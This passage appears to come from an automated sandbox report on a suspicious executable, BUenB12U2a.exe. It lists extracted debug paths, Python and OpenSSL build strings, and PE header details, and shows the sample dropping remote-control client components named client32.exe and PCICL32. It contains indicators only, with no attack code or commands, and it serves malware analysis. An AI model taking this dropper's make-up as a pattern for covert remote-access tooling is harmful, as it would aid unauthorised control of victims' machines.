                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: BUenB12U2a.exe, 00000001.00000002.2048240010.00007FFE13320000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047237276.00007FFE11EBC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdb source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578656714.0000000072A02000.00000002.00000001.01000000.00000018.sdmp, client32.exe, 00000009.00000002.1882967027.0000000072A02000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdbOGPS source: BUenB12U2a.exe, 00000001.00000002.2046118971.00007FFDFB858000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2048699766.00007FFE1A473000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\re source: BUenB12U2a.exe, 00000001.00000003.1792443499.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047920798.00007FFE13303000.00000002.00000001.01000000.0000000D.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdb source: BUenB12U2a.exe, 00000001.00000002.2043270847.00007FFDFB134000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: BUenB12U2a.exe, 00000001.00000002.2046552473.00007FFE1024D000.00000002.00000001.01000000.0000000E.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000000.1797525197.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000006.00000002.3573445263.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000009.00000002.1881091510.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000009.00000000.1879479005.0000000000A62000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAF59000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2048699766.00007FFE1A473000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: BUenB12U2a.exe, 00000001.00000003.1791653644.0000020E48128000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48128000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1791270867.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3577865426.000000006CB81000.00000020.00000001.01000000.0000001A.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2046822337.00007FFE10307000.00000002.00000001.01000000.00000012.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047481292.00007FFE11EDD000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\htctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1790942372.0000020E47972000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047013819.00007FFE11518000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2041453144.00007FFDFABA0000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAFF1000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: BUenB12U2a.exe, 00000001.00000002.2043270847.00007FFDFB134000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\PCICL32.pdb source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\AudioCapture\Release\AudioCapture.pdb source: BUenB12U2a.exe, 00000001.00000003.2010596571.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012237313.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2010748148.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2019629636.0000020E478FA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAFF1000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: BUenB12U2a.exe, 00000001.00000002.2043708725.00007FFDFB50B000.00000002.00000001.01000000.00000005.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdbN source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdbIsDBCSLeadByte4CompareStringAH source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdbP@ source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047237276.00007FFE11EBC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047703009.00007FFE130C3000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792443499.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031012733.0000020E46B20000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: BUenB12U2a.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: 0x74DC4D47 [Tue Feb 17 01:39:19 2032 UTC]
